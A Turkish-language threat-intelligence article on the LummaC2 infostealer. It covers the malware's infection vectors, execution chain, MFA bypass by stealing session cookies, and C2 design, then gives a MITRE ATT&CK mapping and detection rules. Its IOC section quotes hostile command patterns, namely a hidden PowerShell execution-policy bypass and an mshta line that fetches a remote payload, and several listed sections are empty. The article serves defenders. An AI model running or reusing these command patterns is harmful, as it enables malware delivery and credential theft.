
Siber tehdit dünyası 2025 yılında köklü bir dönüşüm geçirdi. Fidye yazılımları (ransomware) hâlâ gündemde olsa da asıl sahneyi infostealer’lar — yani bilgi hırsızı yazılımlar — ele geçirdi. Bu yazılımların bu denli tehlikeli hale gelmesinin temel nedeni, çok faktörlü doğrulamayı (MFA) devre dışı bırakabilme yetenekleridir. Kullanıcı adı ve şifre çalmak artık yetmiyor; modern infostealer’lar doğrudan tarayıcıdan oturum çerezlerini (session token) çalarak kullanıcının aktif oturumuna MFA adımını atlatarak sızabiliyor.
Rakamlar durumun ciddiyetini gözler önüne seriyor:
Infostealer’lar tek başına bir tehdit olmakla kalmıyor; çalınan veriler dark web’de satılarak fidye yazılımı saldırıları, BEC (Business Email Compromise) ve kripto para dolandırıcılıkları için zemin hazırlıyor. Bu zincirin en güçlü halkalarından biri ise LummaC2’dir.
LummaC2 (Lumma Stealer), C diliyle yazılmış, Malware-as-a-Service (MaaS) modeliyle dağıtılan en tehlikeli infostealer yazılımlarından biridir. Kripto cüzdanları, tarayıcı çerezleri ve 2FA uygulamalarını hedef alan bu yazılımın 2022’den günümüze uzanan tarihçesi şu şekildedir:
Doğuşu ve Pazara Giriş (2022–2023)
Yükseliş ve Teknik Evrim (2023–2024)
Zirve Noktası (2024–2025 Başı)
Küresel Takedown Operasyonu (Mayıs 2025)
Günümüz (2025 Sonu–2026)
Takedown operasyonu LummaC2’ye ağır bir darbe vurdu ancak tehdit tamamen ortadan kalkmadı. Geliştiriciler kod tabanını değiştirerek ve EtherHiding gibi blockchain tabanlı altyapıya geçerek yeni sürümler (v4.0+) üretmeye devam ediyor. Enfeksiyon sayıları operasyon öncesi seviyelere geri dönüyor.
LummaC2, kurban cihazlarına ilk erişimi sağlamak için sosyal mühendislik ve teknik aldatmacayı bir arada kullanan dört temel vektöre dayanır.
Phishing (Oltalama)
Kurumsal hedeflere yönelik spear-phishing veya sahte fatura/kargo bildirimleri biçiminde yürütülür.
Fake CAPTCHA — ClickFix
LummaC2’nin son yıllardaki en inovatif vektörlerinden biridir.
Malvertising (Zararlı Reklamcılık)
Google Ads ve Bing Ads sistemleri istismar edilerek meşru yazılımlar taklit edilir.
Fake Crack / Loader (Sahte Crack ve Hile Yazılımları)
Oyuncuları ve yazılım kullanıcılarını hedef alan klasik ama etkili bir yöntem.
LummaC2 kurban cihazına düştükten sonra beş adımlı bir execution zinciri izler:

Adım 1 — İlk Tetikleyici: Kullanıcı zararlı dosyayı çalıştırır. Dosya .exe, .msi, .lnk veya doğrudan PowerShell scripti formatında gelebilir.
Adım 2 — Loader Aşaması: Ana payload hemen çalışmaz. Önce bir loader devreye girer; Windows Defender’ı devre dışı bırakır, execution policy’yi değiştirir ve asıl LummaC2 payload’ını bellekte çalıştırır. Disk üzerinde iz bırakmamak için reflective DLL injection veya process hollowing teknikleri kullanılır.
Adım 3 — Anti-Sandbox Kontrolleri: LummaC2 çalışmadan önce ortamı analiz eder:
Kontroller geçilirse execution devam eder, geçilemezse process kendini sonlandırır.
Adım 4 — Memory Injection: LummaC2 kodu explorer.exe, regasm.exe veya svchost.exe gibi meşru bir Windows sürecine enjekte edilir. Task Manager’da zararlı bir process görünmez.
Adım 5 — Veri Toplama Başlar: Bellek enjeksiyonu tamamlanınca credential theft mekanizması devreye girer.
Kalıcılık Mekanizmaları
LummaC2, sistem yeniden başlatıldıktan sonra da aktif kalmak için birden fazla yöntem kullanır:
Tespitten Kaçınma Teknikleri
LummaC2’nin asıl amacı bu bölümde netleşiyor. Üç ana hedef kategorisi vardır:
Tarayıcı Verisi
Chrome, Edge, Firefox, Brave gibi tarayıcıların SQLite veritabanlarına erişir (Login Data, Cookies, Web Data dosyaları). Chrome’un DPAPI ile şifrelediği verileri, mevcut kullanıcı oturumunu kullanarak decrypt eder — kullanıcı giriş yapmışsa şifreler açık metin olarak okunabilir.
Session Token Hırsızlığı → MFA Bypass
En kritik nokta burasıdır. Kullanıcı bir siteye giriş yapıp MFA’yı geçtikten sonra tarayıcıda oturum çerezi (session cookie) oluşur. LummaC2 bu çerezi çalarsa saldırgan, MFA adımı olmadan doğrudan o oturuma girer. Google, Microsoft 365, Slack ve GitHub gibi kurumsal platformlar bu yöntemle ele geçirilir.
Kripto Cüzdanlar
MetaMask, Exodus, Electrum, Ledger Live gibi tarayıcı uzantıları ve masaüstü uygulamalarının wallet dosyalarını hedef alır; seed phrase ve private key dosyalarını arar.
Sistem Bilgisi Toplama
IP adresi, işletim sistemi versiyonu, yüklü yazılım listesi ve ekran görüntüsü alınır. Tüm bu veriler C2’ye gönderilecek System.txt dosyasına yazılır.
LummaC2’nin komuta-kontrol altyapısı katmanlı ve dirençli olarak tasarlanmıştır.
Birincil İletişim
Malware içine hardcoded domain listesi gömülüdür. Bu domainler genellikle .shop, .ru, .su uzantılı rastgele isimler içerir. Tüm trafik Cloudflare üzerinden geçer; IP bloklama etkisiz kalır.
Fallback Mekanizması
Birincil domainler erişilemez olursa sıradaki yöntemler devreye girer:
Veri Sızdırma
Toplanan veriler .zip olarak sıkıştırılır, HTTPS üzerinden C2’ye gönderilir. Operatör, web panelinden çalınan kimlik bilgilerine gerçek zamanlı erişebilir.
Aşağıdaki göstergeler LummaC2 kampanyalarında tespit edilen örnek değerlerdir:
Domain Örüntüleri
User-Agent String
Dosya Sistemi Artifact’ları
PowerShell Komut Örüntüleri
powershell -WindowStyle hidden -ExecutionPolicy Bypass -Command “[Net.ServicePointManager]…”
mshta http://[domain]/[payload]
Hash Örnekleri (ANY.RUN ve VirusTotal Üzerinden Doğrulanabilir)
Güncel hash değerleri için: https://any.run → LummaC2 etiketi ile arama yapılabilir.
| Taktik | Teknik | ID |
|---|---|---|
| Initial Access | Phishing | T1566 |
| Initial Access | Drive-by Compromise (Malvertising) | T1189 |
| Execution | PowerShell | T1059.001 |
| Execution | User Execution (Fake CAPTCHA) | T1204 |
| Persistence | Registry Run Keys | T1547.001 |
| Persistence | Scheduled Task | T1053.005 |
| Defense Evasion | Obfuscated Files or Information | T1027 |
| Defense Evasion | Process Injection | T1055 |
| Defense Evasion | Masquerading (LOLBAS) | T1036 |
| Defense Evasion | Virtualization/Sandbox Evasion | T1497 |
| Credential Access | Credentials from Web Browsers | T1555.003 |
| Credential Access | Steal Web Session Cookie | T1539 |
| Collection | Clipboard Data | T1115 |
| Command & Control | Web Service (Telegram/Steam) | T1102 |
| Command & Control | Encrypted Channel | T1573 |
| Exfiltration | Exfiltration Over C2 Channel | T1041 |
Kaynak: MITRE ATT&CK — Lumma Stealer (S1213)
Tespit Kuralları (Detection)
PowerShell Anomalileri:
process_name = “powershell.exe” AND (command_line contains “ExecutionPolicy Bypass” OR command_line contains “WindowStyle Hidden” OR command_line contains “Net.ServicePointManager”)
LOLBAS Kullanımı:
process_name IN (“mshta.exe”, “certutil.exe”, “bitsadmin.exe”) AND network_connection = true
Şüpheli Process Enjeksiyonu:
parent_process = “explorer.exe” AND child_process IN (“regasm.exe”, “svchost.exe”) AND network_connection = true
C2 Trafik Örüntüsü:
Proaktif Önlemler
Olay Müdahalesi
LummaC2 tespiti durumunda öncelikli aksiyonlar:
-